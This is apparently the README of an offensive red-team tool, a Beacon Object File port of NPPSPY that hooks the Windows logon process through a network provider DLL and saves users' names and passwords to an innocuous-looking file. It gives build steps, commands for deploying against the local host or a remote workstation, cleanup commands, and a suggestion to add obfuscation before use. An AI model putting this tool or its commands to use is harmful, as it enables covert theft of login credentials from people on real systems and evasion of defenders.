Porting of NPPSPY by Grzegorz Tworek to 'man in the middle' the user logon process, and store the user's name and password in an unassuming file.
I have modified the DLL a little bit and you may want to add more changes or obfuscation before using it
Target local host
bof-NPPSPY local
Target remote host
bof-NPPSPY WS01
Cleanup
cleanup command is provided as above
local:
bof-NPPSPY local cleanup <cleanupvalue>
remote:
bof-NPPSPY WS01 cleanup <cleanupvalue>
git clone https://github.com/VoldeSec/BOF-NPPSPY.git
cd BOF-NPPSPY
make
NPPSPY by Grzegorz Tworek - https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy